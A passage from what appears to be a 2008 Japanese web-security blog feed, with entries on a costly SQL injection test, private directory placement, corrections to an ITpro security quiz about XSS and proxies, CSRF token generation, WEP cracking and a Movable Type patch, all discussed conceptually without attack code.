class="snip"><em>(～中略～)</em></p><p>SQLインジェクションの検査は、専門家がやっても時としてデータベースを破壊しかねないものであるので、診断に先立って必ず免責事項を取り交わす。そのような危険を伴う診断行為を一般ユーザに試させるのであれば、まずは安全第一の検査パターンを紹介した上で、診断に伴う危険性を十分に告知することが検査会社としての責務であると考える。</p></blockquote></div><p>これ、個人的に恐怖体験があります。</p><p>「<a href="http://jvn.jp/jp/JVN92832583/">JVN#92832583 Advance-Flow におけるクロスサイトスクリプティングの脆弱性</a> <em class="domain-info">(jvn.jp)</em>」というのがありますが、私がこれを発見したとき、同時にSQLインジェクションを思わせるエラーメッセージが出ることも発見していました。で、社内で報告してテスト環境で検証したりとかいろいろしていたのですが、テスト環境のデータが全滅……。DELETE文を発行するようなことは一切していないはずですし、何故消えたのかよく分かりませんでしたが、ともあれテストパターンのいずれかで全滅したのは間違いないものと思います。内部で複雑なSQL文を発行していると、予想外のことが起きたりするようです。</p><p>で、怖いのはここからです。なんとその翌日、「データが全部消えました!」というメールが……。テスト環境でしか試していないはずだったのに、何故か本番環境のデータまで一緒に消えたというミステリ。</p><p>さらに、SQLインジェクションとして届け出たら、</p><div class="quote-and-cite"><blockquote><p>製品開発者は SQL 文自身は実行されず、入力値によってエラーが発生する現象であり、SQL インジェクションとは呼べないと判断されました。</p></blockquote></div><p>という連絡が来まして、<em>そもそもSQLインジェクションは存在しなかった</em>ということに。</p><p>では、私が見たものはいったい何だったのか?</p><p>……とても怖い心霊現象ですね。稲川淳二とも渡り合える怖さです。</p><p class="note">※まあ、本番環境が消えてしまったのはたぶん何かの手違いだろうと思いますが、「SQLインジェクションはなかった」というのはホントに怖い話です。</p><p>ともあれ、それ以来、個人的には「単引用符の後ろに文字列を入れない」ということを心がけるようにしております。</p><p class="note">※2008-11-19追記: 念のため補足。「単引用符の後ろに文字列を入れない」というのは<em>検査時の注意</em>で、実装の話ではありませんので念のため。私は Advance-Flow の一ユーザに過ぎず、実装とは無関係です。</p><ul class="comment-link"><li><a href="../topic/3387/comment">「怪談: SQLインジェクションの恐怖」へのコメント (1件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/Web">Web</a> / <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a></span></p></div></div></content></entry><entry><title>非公開ディレクトリvs非公開設定</title><link href="http://bakera.jp/ebi/topic/3367" /><id>tag:bakera.jp,2008:/ebi/topic/3367</id><updated>2008-11-14T02:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2008/11/10">2008年11月10日(月曜日)</a></h1><div class="topic"><h2><a href="../topic/3367">非公開ディレクトリvs非公開設定</a></h2><p class="subinfo"><span class="updated">更新: 2008年11月14日2時0分頃</span></p><p>「<a href="http://d.hatena.ne.jp/ockeghem/20081109/p1">データベースファイルは公開ディレクトリに格納すべきではない</a> <em class="domain-info">(d.hatena.ne.jp)</em>」。</p><div class="quote-and-cite"><blockquote><p>重要なデータファイルは、外部から閲覧できるディレクトリに格納すべきではない。外部から閲覧できないディレクトリにしておけば、httpd.confにわざわざ指定する必要もないのだ。</p></blockquote></div><p>見られて困るデータファイルは、公開ディレクトリに配置して非公開に設定するのではなく、非公開ディレクトリに配置するべきだというお話。</p><p>……で、この話で思い出したことが。</p><p>以前、社内で「cgi-binはドキュメントルートの外に置いてScriptAliasにするべきだ」という意見に対し、「cgi-binは普通のディレクトリにExecCGIでも良いのではないか」という意見が出て議論になったことがあります。</p><p>ScriptAlias派の意見としては、こういうことです。</p><ul><li>データファイルをcgi-binに置くべきではないが、うっかり置いても大丈夫な状態の方が良いのではないか。</li></ul><p>それに対し、ExecCGI派の意見はこうなのですね。</p><ul><li>データファイルをうっかりcgi-binに置くことは絶対にあってはならない。</li><li>仮に今は見えない状態であっても、サーバ移転等、何らかの理由で設定が変更されれば危険になるかもしれない。実際、TBCはサーバ移転の設定変更で漏洩を招いたが、cgi-bin以下にデータを置いても見えないという油断が危機を招いた。</li><li>あえてcgi-bin以下が見えるようにすることで、データを置くことを戒めるべきである。</li></ul><p>つまり、「データは見えないディレクトリに置くべし」ということを徹底するために、あえてcgi-bin以下のファイルが見えるように設定するという発想です。まあ半分くらい冗談のような気もしますが、「とにかくScriptAliasのほうが安全」という短絡的な発想よりよっぽど良いかも、と思ったりしたものでした。</p><p class="note">※2008-11-14追記: と、のんきに書いていたら、なんということでしょう、<a href="../topic/3378">吉本興業が丸見え系で情報漏洩</a>。見事に前車の轍を踏みました。このご時世にこんなことが起きるとは……。</p><ul class="comment-link"><li><a href="../topic/3367/comment">「非公開ディレクトリvs非公開設定」へのコメント (4件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a></span></p></div></div></content></entry><entry><title>bakera.jpシステムリニューアル その6</title><link href="http://bakera.jp/ebi/topic/3363" /><id>tag:bakera.jp,2008:/ebi/topic/3363</id><updated>2008-11-09T13:35:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2008/11/8">2008年11月8日(土曜日)</a></h1><div class="topic"><h2><a href="../topic/3363">bakera.jpシステムリニューアル その6</a></h2><p class="subinfo"><span class="updated">更新: 2008年11月9日13時35分頃</span></p><p>意味不明の死が再び。</p><p>どうもメモリを使いすぎているような気がするので、レスポンスをいったんディスクに書いてから返すようにしてみました。実メモリが512MBしかないのに、300MB以上使っていたという……。</p><p class="note">※しかし、こういう修正の後はバグが続出したりするのが世の常。少し様子見で。</p><p>半日様子を見ましたが、メモリ使用量は170MB前後で落ち着いている模様。効果は出ているようですね。</p><ul class="comment-link"><li><a href="../topic/3363/comment">「bakera.jpシステムリニューアル その6」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/bakera.jp">bakera.jp</a> / <a href="../genre/hatomaru.dll">hatomaru.dll</a></span></p></div></div></content></entry><entry><title>ITproのセキュリティ検定がヤバイ</title><link href="http://bakera.jp/ebi/topic/3357" /><id>tag:bakera.jp,2008:/ebi/topic/3357</id><updated>2008-11-07T01:55:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2008/11/6">2008年11月6日(木曜日)</a></h1><div class="topic"><h2><a href="../topic/3357">ITproのセキュリティ検定がヤバイ</a></h2><p class="subinfo"><span class="updated">更新: 2008年11月7日1時55分頃</span></p><p>こんなのがあったのですね。「<a href="http://itpro.nikkeibp.co.jp/article/COLUMN/20080911/314662/">ITpro EXPO検定---全11分野で，あなたのIT理解度はいかに？</a> <em class="domain-info">(itpro.nikkeibp.co.jp)</em>」。</p><p>セキュリティ検定の解説もあったので見てみましたが、超難問が3問ほどあったので、独自に解説してみます。</p><div class="section"><h3 id="section30">問題2</h3><div class="quote-and-cite"><blockquote cite="http://itpro.nikkeibp.co.jp/article/COLUMN/20080901/313898/?ST=itproexpo&amp;P=2"><p>Webブラウザを狙うクロスサイト・スクリプティングは，どのような問題点によって起こるでしょうか。</p><p>A） クライアントOSの弱点（ぜい弱性）</p><p>B） Webブラウザを使うユーザーの油断</p><p>C） Webブラウザの弱点（ぜい弱性）</p><p>D） Webサーバーの弱点（ぜい弱性）</p></blockquote><p class="cite">以上、<a href="http://itpro.nikkeibp.co.jp/article/COLUMN/20080901/313898/?ST=itproexpo&amp;P=2">セキュリティ検定の解説【問題2】</a> より</p></div><p>「WebサーバやWebブラウザにもクロスサイトスクリプティング脆弱性がある」という知識を問う問題ですね。<dfn class="glossary"><a href="../../glossary/XSS">XSS</a></dfn>というと普通はWebアプリケーションの問題ですが、WebブラウザやWebサーバに問題がある場合もあります。</p><p>XSSは、攻撃者の用意したスクリプト等が他のドメインで動作すること全般を指します。ブラウザに問題がある場合、「攻撃者の用意したスクリプトがローカルで実行されてしまう」という強烈なセキュリティホールが発生することがありますが、これもクロスサイトスクリプティングの一種と考えられています。</p><p>ブラウザのXSS脆弱性は、当然ながらブラウザ側の問題ですので、ブラウザ側に修正が入ることになります。実際、過去にそのような修正は何度も行われています。最近ですと、Operaの「<a href="http://www.opera.com/support/search/view/907/">Advisory: The links panel can allow cross-site scripting</a> <em class="domain-info">(www.opera.com)</em>」が記憶に新しいですね。</p><p>WebサーバにXSS脆弱性が存在するケースもあります。良くあるのはエラーページの出力内容がエスケープされていないというものです。最近はさすがに枯れてきた感がありますが、<a href="http://jvn.jp/jp/JVN80057925/">mod_imapのXSS</a> <em class="domain-info">(jvn.jp)</em>などは去年の話ですね。</p><p>というわけで、CとDはどちらも正解に見えますが、問題文では、「Webブラウザを狙う」と限定されています。Webサーバに対するXSSでは、Cookieの奪取、フィッシングサイトの表示などが行われますが、ローカル権限でWebブラウザ自体を制御したりするような攻撃は不可能です。ブラウザの脆弱性を突くような攻撃をすれば……と思うかもしれませんが、そのような攻撃は攻撃者自身が用意した悪意あるサイトにアクセスさせれば十分で、WebサイトのXSSとは関係なく実行できます。悪意あるサイトに誘導する目的でXSSが利用される事はありますが、それは単に誘導の手段に使われているだけで、XSSによって攻撃されているわけではありません。</p><p>WebブラウザにXSS脆弱性がある場合には、その脆弱性を利用されてWebブラウザが制御されてしまうようなこともあり得ます。よって、Cが正解となります。</p></div><div class="section"><h3 id="section31">問題3</h3><div class="quote-and-cite"><blockquote cite="http://itpro.nikkeibp.co.jp/article/COLUMN/20080901/313898/?ST=itproexpo&amp;P=3"><p>Webブラウザを狙う攻撃を避けるために，次のうちで最も効果的な方法はどれでしょうか。</p><p>A） アダルト・サイトなどへのアクセスを避ける</p><p>B） ウイルス対策ソフトをきちんと運用する</p><p>C） JavaScriptが動作しないようにブラウザの設定を変える</p><p>D） ActiveXが動作しないようにブラウザの設定を変える</p></blockquote><p class="cite">以上、<a href="http://itpro.nikkeibp.co.jp/article/COLUMN/20080901/313898/?ST=itproexpo&amp;P=3">セキュリティ検定の解説【問題3】</a> より</p></div><p>超難問です。どう見ても正解が存在しません。</p><p>Webブラウザを狙う攻撃を避けるために重要なのは、なんといってもセキュリティアップデートでしょう。それを怠っていればJS無効だろうがActiceX無効だろうがやられてしまいます。しかし、選択肢にはこれがなく、頼りない厳しい選択肢ばかりです。</p><p>どれも不正解だと思いますが、この中から「最も」効果がありそうなものということであえて選ぶなら、アンチウィルスソフトでしょうか。「きちんと運用」している前提なので、既知の攻撃コードを検出して防いでくれることをある程度期待できると思います。たとえば、カカクコム事件はNOD32が反応したのが発覚のきっかけでしたが、このときNOD32はトロイの木馬を検出し、感染を防いだわけです。</p><p>ちなみに、このとき悪用されたのは<a href="http://www.microsoft.com/japan/technet/security/bulletin/MS04-013.mspx">MS04-013</a> <em class="domain-info">(www.microsoft.com)</em>で、そもそもセキュリティアップデートをきちんと行っていれば感染しなかったわけですが……。MS04-013はマイコンピュータゾーンでスクリプトが実行されてしまう脆弱性なので、<em>マイコンピュータゾーンの</em>スクリプトを無効にできれば防げますが、そんなことは普通はできません。レジストリ改造で無理矢理無効にすることはできますが、そうするとWindowsの機能が使えなくなったりします。そんなマニアックな設定をしている暇があったらパッチを当てるべきでしょう。</p><p>というわけで、あえて選ぶならBかなぁと。もちろん、アンチウィルスで全てが防げるわけではありませんが、「スクリプト無効」とか「ActiveX無効」とかに比べれば、攻撃を防げる確率は高いのではないですかね。</p><p class="note">※私は普段スクリプトもActiveXも無効にしていますが、これで攻撃が防げるとは思っていません。そもそも、一般の人にお勧めできないですしね。……一般の人に気軽にお勧めできるという意味では、意外と「アダルト・サイトなどへのアクセスを避ける」が有力な気もしてきたなぁ。:-)</p></div><div class="section"><h3 id="section32">問題6</h3><div class="quote-and-cite"><blockquote cite="http://itpro.nikkeibp.co.jp/article/COLUMN/20080901/313898/?ST=itproexpo&amp;P=6"><p>ブラウザへの攻撃では，攻撃者はユーザーを悪質なサイトに誘導し，悪質なプログラムを送り付けます。これを防ぐ策として有効なのはどれでしょうか。</p><p>A） FirefoxなどInternet Explorer以外のブラウザを使う</p><p>B） URLフィルタリングで悪質サイトへのアクセスを遮断する</p><p>C） IDS/IPS（侵入検知/防御システム）を導入する</p><p>D） 認証機能を持つプロキシ・サーバーを導入する</p></blockquote><p class="cite">以上、<a href="http://itpro.nikkeibp.co.jp/article/COLUMN/20080901/313898/?ST=itproexpo&amp;P=6">セキュリティ検定の解説【問題6】</a> より</p></div><p>ああ、Dは「<a href="http://itpro.nikkeibp.co.jp/article/NEWS/20080313/296115/">改ざんWebサイト対抗にHTTPプロキシ/認証プロキシの導入を――専門家が提言</a> <em class="domain-info">(itpro.nikkeibp.co.jp)</em>」の話ですね。これ、元の記事が微妙なのだと思いますが、勘違いしている人が結構多いような気がします。</p><p>「認証機能を持つプロキシ・サーバー」を導入しても、ユーザは普通に認証して普通に通信し、普通にファイルをダウンロードできます。マルウェアも攻撃コードも普通にダウンロードできますから、感染を回避することはできません。</p><p>ただ、「認証機能を持つプロキシ・サーバー」を通すようにすると、感染済みのマルウェアが外部と通信することが難しくなります。最近のマルウェアは外部と独自に通信して情報を送受信したり、追加モジュールをダウンロードしたりすることがあります。マルウェアが自前でHTTPを喋って外部と通信する場合、「認証機能を持つプロキシ・サーバー」を通ることができませんから、通信に失敗します。</p><p>そして、中には「初回感染時にはダウンロード機能しか存在せず、危険な機能は全部追加モジュールになっている」というタイプのマルウェアが存在します。こういうタイプのマルウェアの場合、ダウンロードを阻止されると「ダウンロードを試みる」以外に悪意ある活動ができなくなりますので、活動を抑え込むことができるわけです。</p><p>ただし、この場合でもマルウェアにはしっかり感染していることに注意してください。単独でちゃんと活動できるマルウェアもありますし、ダウンロードを試みられるだけでも十分迷惑です。</p><p class="note">※また、ユーザが一度認証を通れば、ブラウザからの通信はできるということに注意が必要です。マルウェアがブラウザをコントロールして通信するようにプログラムされていれば、外部と通信できてしまいます。「認証機能を持つプロキシ・サーバー」が一般的になれば、マルウェア側が対応してくるだけではないかと言われています。</p><p>というわけで、選択肢Dはマルウェアが感染してしまった後の活動を妨害する施策なのです。マルウェアの感染自体を防ぐ施策ではありませんので、注意が必要です。</p><p>さて、この問題では「悪質なプログラムを送り付け」られることを防ぐ策を質問しています。説明したとおりDでは防げませんし、AとCは論外ですから、消去法でBの「URLフィルタリング」となりますが……これもかなり微妙で、焼け石に水程度の効果しかないと思います。正解なしとしたいところですが、どうしても一つ選ぶのであればBしかありません。</p></div><p>……ここで<a href="http://itpro.nikkeibp.co.jp/article/COLUMN/20080910/314530/?ST=itproexpo&amp;P=2">講評</a> <em class="domain-info">(itpro.nikkeibp.co.jp)</em>を読むと、もう何というか、見事に引っかけ問題に引っかかっている感じなのですね。</p><div class="section"><h3 id="section33">問題2の講評</h3><div class="quote-and-cite"><blockquote><p>問題2は「クロスサイト・スクリプティング」という攻撃手法を正しく理解しているかを確認する内容である。クロスサイト・スクリプティングは，ユーザーのブラウザを介して，悪意のスクリプトをぜい弱性のあるWebサイトに送り込む攻撃である。そのパソコンに保存されている個人情報を第三者に転送したりできるという特徴がある。</p><p>クロスサイト・スクリプティングが起こる原因となる問題点を聞いたら，正解である「Webサーバーの弱点」が46.2％，「Webブラウザの弱点」が45.1％が拮抗（きっこう）していた。攻撃の仕組みから，「ブラウザに問題あり」と間違えやすいといえる。</p></blockquote></div><p>うわぁ。「パソコンに保存されている個人情報を第三者に転送したりできる」……って、普通のXSSではそんなことは不可能です。それこそ、ブラウザにXSSがあって、ローカルでスクリプトが動作してしまう場合にのみ可能な攻撃ですね。</p><p><dfn class="glossary"><a href="../../glossary/DNS%20Rebinding">DNS Rebinding</a></dfn>によって127.0.0.1でスクリプトを動作させる技も考えられますが、それもサーバの脆弱性ではなく、DNS Rebindingを許すクライアント側の問題です。いずれにしても「ブラウザの脆弱性」として良いでしょう。</p></div><div class="section"><h3 id="section34">問題3の講評</h3><div class="quote-and-cite"><blockquote><p>問題3も間違えやすかった。Webブラウザへの攻撃を避けるための最も効果的な方法を聞いたところ，「ウイルス対策ソフトをきちんと適用する」が37.4％と最も多かった。確かにウイルス対策ソフトの適用は不可欠である。しかし，ウイルスは多種多様であり，ゼロデイ攻撃も多発している。</p><p>正解は，「JavaScriptを動作しないように設定する」である（正答率30.0％）。Webブラウザを狙う攻撃の多くは，JavaScriptを悪用する。たとえば，IFRAMEタグを使い，サイズがゼロのフレームを作り，ここで悪質なJavaScriptを実行させる攻撃が流行している。サイズがゼロなので，ユーザーには見えないが，ブラウザ上でせっせと悪さをする。このような攻撃を防ぐには，JavaScriptを実行させないようにする。</p></blockquote></div><p>「ウイルスは多種多様であり、ゼロデイ攻撃も多発している」という文章を「攻撃手法は多種多様であり、スクリプトに依存しない攻撃も多発している」と書き換えれば結論が180度変わりますね。</p><p>いつも思うのですけれど、スクリプト無効って誰でもそんな簡単に運用できるのでしょうか。サイトにアクセスして真っ白の画面が出たとき、ソースを見て「これはスクリプトを有効にすれば動く」という判断ができる人なら運用できると思うのですが、そうでないと厳しいと思うのですよね。HTMLやJSのソースコードが読める人ならともかく、普通の人にはちょっとお勧めできないと思うのです。</p></div><div class="section"><h3 id="section35">問題6の講評</h3><div class="quote-and-cite"><blockquote><p>確かにURLフィルタリングには，悪質なサイトへのアクセスを防ぐ効果がある。悪質サイトのURLを集めたブラックリストによってアクセスを遮断できる。ただ，攻撃者はボットを埋め込んだ多数のコンピュータをプロキシとして使い，その踏み台を頻繁に切り替えて攻撃を仕掛けてくる。このため，URLフィルタリングでは止めきれないのが実情である。</p></blockquote></div><p>まあ、確かにBでは「止めきれない」ですが、Dでは「全く止められない」のですから、Bを選ぶよりほかありません。</p><div class="quote-and-cite"><blockquote><p>正解の「認証機能を持つプロキシ・サーバーを導入」は，「悪質なプログラムを送り付ける」ことを防ぐ対策である。悪質なサイトにアクセスしてしまうことを防ぐのは難しい。ならば，そのあとの被害を最小限に抑えようという考え方である。Webサイトにアクセスする際に，プロキシでユーザー認証を必要とするように設定しておく。外部のWebサイトと通信するダウンロードは，この認証でブロックされるため，ウイルスなどの悪意のプログラムが侵入するのを防止できるというわけだ。</p></blockquote></div><p>これはやはり誤解しているようですね。前半を正しく書き直すと、こうですかね。</p><div class="sample"><p>不正解の「認証機能を持つプロキシ・サーバーを導入」は，「悪質なプログラムが外部とアクセスする」ことを防ぐ対策である。悪質なプログラムに感染してしまうことを防ぐのは難しい。ならば，そのあとの被害を最小限に抑えようという考え方である。</p></div><p>外部から「悪質なプログラムを送り付ける」ことを防ぐのではなく、感染済みのマルウェアが「悪質なプログラムを取りに行く」ことを防ぐだけです。マルウェアの侵入を防ぐのではなく、侵入してしまった後の活動を妨害することが主眼となっている施策ですので、誤解しないようにしましょう。</p><p>正解率は13.7%ということなので、回答者のほとんどは正しく理解できているようで逆に安心ですね。</p></div><ul class="comment-link"><li><a href="../topic/3357/comment">「ITproのセキュリティ検定がヤバイ」へのコメント (5件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/ITpro">ITpro</a></span></p></div></div></content></entry><entry><title>Outlook2003 SP3でIMEの変換中の色がおかしい話</title><link href="http://bakera.jp/ebi/topic/3161" /><id>tag:bakera.jp,2008:/ebi/topic/3161</id><updated>2008-10-31T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2008/6/18">2008年6月18日(水曜日)</a></h1><div class="topic"><h2><a href="../topic/3161">Outlook2003 SP3でIMEの変換中の色がおかしい話</a></h2><p class="subinfo"><span class="updated">更新: 2008年10月31日</span></p><p>会社のマシンでWindows UpdateしたらOffice 2003 SP3が出ていたので、なんとなく適用。すると、何故か変換中の文字がまったく見えなくなるという現象が発生しました。</p><p>調べてみると、「<a href="http://support.justsystems.com/faq/1032/app/servlet/qadoc?QID=035938">Microsoft Office 2003 SP3を導入すると、入力した文字が見えなくなったり、黒く反転して表示される</a> <em class="domain-info">(support.justsystems.com)</em>」という文書が。</p><div class="quote-and-cite"><blockquote><p>［キー／ローマ字／色の設定］の［色設定］で［ATOK］が設定されている場合は、［Microsoft IME］を選択します。</p><p>［OK］をクリックします。</p></blockquote></div><p>うわぁ。色設定をATOKにしているとダメだから他のに変えろと。色設定ATOKのままで使い続ける方法は無いということですか。もうね……。</p><p>なんかもう、すべて無かったことにしてATOKをインストールしたほうが良いのかも。</p><p class="note">※2008-10-31追記: 7月にパッチが出ており、それを適用すると対応できるようです (たまさん情報ありがとうございます)。</p><ul class="comment-link"><li><a href="../topic/3161/comment">「Outlook2003 SP3でIMEの変換中の色がおかしい話」へのコメント (2件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/Microsoft">Microsoft</a> / <a href="../genre/ATOK">ATOK</a> / <a href="../genre/Microsoft%20Office">Microsoft Office</a></span></p></div></div></content></entry><entry><title>ワンタイムトークンをハッシュ関数で処理する意味はある?</title><link href="http://bakera.jp/ebi/topic/3325" /><id>tag:bakera.jp,2008:/ebi/topic/3325</id><updated>2008-10-29T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2008/10/28">2008年10月28日(火曜日)</a></h1><div class="topic"><h2><a href="../topic/3325">ワンタイムトークンをハッシュ関数で処理する意味はある?</a></h2><p class="subinfo"><span class="updated">更新: 2008年10月29日</span></p><p>「<a href="http://note.openvista.jp/2008/php-security-memo/">PHPでのセキュリティ対策についてのメモ</a> <em class="domain-info">(note.openvista.jp)</em>」。なかなか良くまとまっていると思いますが、<dfn class="glossary"><a href="../../glossary/CSRF">CSRF</a></dfn>の話で少し気になった点が。</p><div class="quote-and-cite"><blockquote cite="http://note.openvista.jp/2008/php-security-memo/#t254cc2"><p>第三者が知り得ない文字列（ユーザIDやワンタイムトークンなど）を<em>ハッシュ関数（md5関数やsha1関数）を複数回用いて擬似乱数化した文字列を</em>フォームに埋め込んでおき、サーバ側で照合することで、リクエストが利用者の意図した動作かどうかをチェックする</p></blockquote><p class="cite">以上、<a href="http://note.openvista.jp/2008/php-security-memo/#t254cc2">PHPでのセキュリティ対策についてのメモ クロスサイトリクエストフォージェリ（略称：CSRF）</a> より</p><p class="citenote">※強調は引用者による。原文では&lt;span class="weaken"&gt;でマーク付けされている</p></div><p class="note">※2008-10-29追記: 引用した部分は既に修正されています。</p><p>「疑似乱数化」ってなんでしょう……。「疑似乱数」は良く聞きますが、「疑似乱数化」は耳慣れない言葉です。複数のハッシュ関数で処理することをそう呼ばれているようなのですが、ハッシュ関数を何度通しても得られる結果は常に一定なはずですから、乱数とはあまり関係ないように思います。</p><p>それから、ユーザIDをハッシュ関数に通してそれをトークンとして使うという手法は、CSRF対策としては不適切です。ハッシュ関数を通すと、「生成後の値から元の値を推測することが困難になる」という効果が得られます。しかし、ここで推測されて困るのは元の値 (ユーザID) ではなく、生成後の値のほうです。ユーザIDとハッシュアルゴリズムがわかれば攻撃者もトークンを作れてしまいますから、CSRFの対策としては問題があります。</p><p class="note">※あるいは、オリジナルのハッシュアルゴリズムを採用して、そのアルゴリズム自体を秘匿するとか? :-)</p><p>ワンタイムトークンを使うのであれば、それ自体は<dfn class="glossary"><a href="../../glossary/CSRF">CSRF</a></dfn>の対策になります。が、トークンが安全に作られていればハッシュ関数を使用する必要はありません。逆に、トークンの生成アルゴリズムに問題があれば、ハッシュ関数を通しても安全にはなりません。ハッシュ関数を使う必要はないと思います。</p><p>なお、類似するケースとして、「セッションIDをハッシュ関数で処理してトークンとして利用する」という処理があります。これは実際、よく見かける実装です。ただ、この場合は「トークンを推測されないように」という理由でハッシュ関数を使っているのではなく、「たとえトークンが漏洩してもセッションIDを推測されないように」という理由でハッシュ関数を使っています。つまり、ここでのハッシュ関数による処理はセッションID漏洩への対策であって、CSRFへの対策ではないのです。</p><p class="note">※もっとも、「トークンだけ漏れてセッションCookieが漏れない」という状況も考えにくいように思うので、このハッシュ関数も必須ではないように思います。気分的な問題で採用されているというのが近いかも。まあ、やっても害はないので問題ありませんが。</p><p>というわけで、「第三者が知り得ない文字列」というところまではよいと思うのですが、その生成方法として「ハッシュ関数を」というのは問題があるように思います。基本的には、安全な疑似乱数を使用して生成する、というのがセオリーでしょう。</p><p>とは言っても、とにかく疑似乱数を使えば良いというわけではありません。疑似乱数にもいろいろありますが、線形合同法やメルセンヌ・ツイスタなどのアルゴリズムでは、値を観測することで次に生成される値が予測されてしまう事があります。</p><p>……ただ、PHPだと、標準では安全な乱数が使えないかも……。</p><p class="note">※通常はセッションIDが安全な疑似乱数によって生成されているので、それをそのまま使うことでもCSRF対策になります。これをそのまま使うのではなく、ハッシュ関数で処理してから使うというのが前述の方法ですね。</p><p class="note">※あと、どうでも良いのですが「セキュリティ対策」という言葉自体に違和感があります。セキュリティに対抗してそれを破るという話ではなく、セキュリティを高めるための話をしていますので……。まあ、意味はわかるので問題はありませんが、どちらかというと「セキュリティ施策」とか言った方が良いのかも。</p><ul class="comment-link"><li><a href="../topic/3325/comment">「ワンタイムトークンをハッシュ関数で処理する意味はある?」へのコメント (3件)</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/Web">Web</a> / <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a></span></p></div></div></content></entry><entry><title>WEPが10秒で解読</title><link href="http://bakera.jp/ebi/topic/3288" /><id>tag:bakera.jp,2008:/ebi/topic/3288</id><updated>2008-10-23T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2008/10/14">2008年10月14日(火曜日)</a></h1><div class="topic"><h2><a href="../topic/3288">WEPが10秒で解読</a></h2><p class="subinfo"><span class="updated">更新: 2008年10月23日</span></p><p><a href="http://internet.watch.impress.co.jp/cda/news/2008/10/14/21162.html">「WEPは10秒で解読可能」、神戸大と広島大のグループが発表</a> <em class="domain-info">(internet.watch.impress.co.jp)</em>だそうで。</p><p>昔から言われていたことではありますが、そろそろ本気で気をつけた方が良いということですね。<a href="http://wifi.nintendo.co.jp/wap/multisecurity/index.html">ニンテンドーWi-Fiネットワークアダプタ</a> <em class="domain-info">(wifi.nintendo.co.jp)</em>のように、ニンテンドーDSと他で使い分けるのが良いのかな……。</p><div class="quote-and-cite"><blockquote><p>森井教授は、「ニンテンドーDSのようにWEPにしか対応していない機器があることなどから、現在でもWEPが広く使われているという現状があるが、先日発表された新モデル（ニンテンドーDSi）ではWPAやWPA2に対応しており、WEPの使用禁止を呼びかけるには良いタイミング」と判断したという。</p></blockquote></div><p>いやー、しかし、そのためだけに買い換えるというのもちょっと……。ニンテンドーDSiにはGBAスロットがないので、ポケモンが困ったりしますし。</p><p class="note">※2008-10-23追記: 実は、DSiでも過去のソフトではWPAやWPA2は使えない模様。参考: <a href="../topic/3318">ニンテンドーDSiでも従来ソフトではWEPになる?</a></p><ul class="comment-link"><li><a href="../topic/3288/comment">「WEPが10秒で解読」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/%E3%83%8B%E3%83%B3%E3%83%86%E3%83%B3%E3%83%89%E3%83%BCDS">ニンテンドーDS</a></span></p></div></div></content></entry><entry><title>MT4.22のセキュリティ修正</title><link href="http://bakera.jp/ebi/topic/3297" /><id>tag:bakera.jp,2008:/ebi/topic/3297</id><updated>2008-10-17T00:00:00+00:00</updated><content type="xhtml" xml:lang="ja" xml:base="http://bakera.jp/ebi/atom"><div xmlns="http://www.w3.org/1999/xhtml"><h1><a href="../2008/10/16">2008年10月16日(木曜日)</a></h1><div class="topic"><h2><a href="../topic/3297">MT4.22のセキュリティ修正</a></h2><p class="subinfo"><span class="updated">更新: 2008年10月17日</span></p><p>「<a href="http://www.movabletype.jp/blog/_movable_type_422.html">[重要] セキュリティアップデート Movable Type 4.22 の提供を開始</a> <em class="domain-info">(www.movabletype.jp)</em>」。</p><div class="quote-and-cite"><blockquote><p>アプリケーション管理画面の一部において、適切に入力エスケープされないため、クロスサイトスクリプティングが発生しうる</p></blockquote></div><p>入力エスケープって……。どちらかというとテンプレートの出力時の不具合だと思うわけですが。</p><p>……というツッコミはさておき。</p><p class="note">※以下、2008-10-17追記。</p><p>詳細が出ていないし謝辞も特に表示されていないので、私が届け出たやつの修正なのかどうかが分からないというのが困ったところ。1日後に<a href="../topic/3299">JVNに出た</a>ので、たぶんそうなのでしょうが……。</p><p class="note">※なんか他のバグ修正も混ざっているっぽい。</p><ul class="comment-link"><li><a href="../topic/3297/comment">「MT4.22のセキュリティ修正」にコメントを書く</a></li></ul><p class="genre"><span class="genre">関連する話題: <a href="../genre/%E3%82%BB%E3%82%AD%E3%83%A5%E3%83%AA%E3%83%86%E3%82%A3">セキュリティ</a> / <a href="../genre/MT">MT</a> / <a href="../genre/IPA">IPA</a> / <a href="../genre/JPCERT%EF%BC%8FCC">JPCERT/CC</a> / <a 